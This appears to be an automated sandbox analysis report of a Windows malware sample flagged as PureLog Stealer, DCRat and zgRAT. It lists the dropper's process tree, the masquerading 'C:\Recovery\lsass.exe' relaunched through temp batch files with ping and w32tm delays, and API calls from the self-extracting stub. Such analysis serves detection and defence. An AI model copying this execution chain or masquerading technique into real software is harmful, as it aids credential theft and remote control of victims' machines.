3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	19:41:54
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\Qsi7IgkrWa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Qsi7IgkrWa.exe"
Imagebase:	0xbb0000
File size:	2'470'804 bytes
MD5 hash:	6296CF36BBBBE91B8FF186D18A08AFA3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:41:54
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe"
Imagebase:	0x80000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:42:01
Start date:	05/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:42:01
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:42:01
Start date:	05/12/2024
Path:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
Wow64 process (32bit):	false
Commandline:	"C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"
Imagebase:	0x8a0000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:42:05
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:42:05
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:42:05
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:42:05
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff70f330000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:42:14
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x230000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:42:18
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:42:18
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:42:18
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff72bec0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:42:18
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff636520000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:42:27
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0xcb0000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:42:31
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:42:31
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:42:31
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	19:42:31
Start date:	05/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65a030000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:42:36
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x350000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:42:40
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	19:42:40
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:42:40
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:42:40
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff636520000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:42:49
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x350000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	19:42:53
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:42:53
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:42:54
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	19:42:54
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff636520000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	19:43:03
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x4b0000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	19:43:06
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	19:43:06
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	19:43:06
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	19:43:06
Start date:	05/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65a030000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	19:43:12
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x100000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:43:15
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:43:15
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	19:43:15
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	19:43:15
Start date:	05/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65a030000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	19:43:20
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x960000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	19:43:23
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	19:43:23
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	19:43:24
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	19:43:24
Start date:	05/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65a030000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	19:43:29
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x2d0000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	19:43:32
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	19:43:32
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	19:43:32
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	19:43:33
Start date:	05/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65a030000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	19:43:38
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0x480000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	19:43:41
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	19:43:41
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	19:43:41
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	19:43:41
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff636520000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	19:43:50
Start date:	05/12/2024
Path:	C:\Recovery\lsass.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\lsass.exe"
Imagebase:	0xf20000
File size:	1'916'928 bytes
MD5 hash:	BD5DF5DC5869453A2501A80C6FC937F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	19:43:54
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Imagebase:	0x7ff699930000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	60
Start time:	19:43:54
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	19:43:54
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7d7430000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	19:43:54
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff636520000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1508
Total number of Limit Nodes:	27

Executed Functions

Function 00BCDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BC087C
Part of subcall function 00BC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BC088E
Part of subcall function 00BC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BC08BF

Part of subcall function 00BCA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BCA655

Part of subcall function 00BCAC16: OleInitialize.OLE32(00000000), ref: 00BCAC2F
Part of subcall function 00BCAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BCAC66
Part of subcall function 00BCAC16: SHGetMalloc.SHELL32(00BF8438), ref: 00BCAC70

GetCommandLineW.KERNEL32 ref: 00BCDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BCDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BCDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00BCDFCE

Part of subcall function 00BCDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00BCDBF4
Part of subcall function 00BCDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BCDC30

CloseHandle.KERNEL32(00000000), ref: 00BCDFD7
GetModuleFileNameW.KERNEL32(00000000,00C0EC90,00000800), ref: 00BCDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00C0EC90), ref: 00BCDFFE
GetLocalTime.KERNEL32(?), ref: 00BCE009
_swprintf.LIBCMT ref: 00BCE048
